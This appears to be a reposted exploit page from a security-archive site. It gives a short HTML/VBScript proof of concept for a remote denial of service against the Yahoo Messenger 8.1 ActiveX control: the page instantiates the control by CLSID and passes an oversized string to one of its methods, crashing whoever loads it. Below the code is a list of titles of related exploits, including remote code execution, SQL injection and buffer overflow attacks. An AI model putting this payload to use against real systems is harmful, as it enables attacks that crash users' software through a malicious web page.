Yahoo Messenger 8.1 (latest) Remote DoS
Safe for Scripting, Safe for Initialize
<html><body>
<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>
<script language=vbscript>
arg1=String(517140, "A")
target.c arg1
</script>
</body></html>
【Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit】相关文章:
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
★ Debian Sarge Multiple IMAP Server Denial of Service Exploit
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ The Personal FTP Server 6.0f RETR Denial of Service Exploit
★ Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
★ MS Windows (MessageBox) Memory Corruption Local Denial of Service
★ minb 0.1.0 Remote Code Execution Exploit
★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability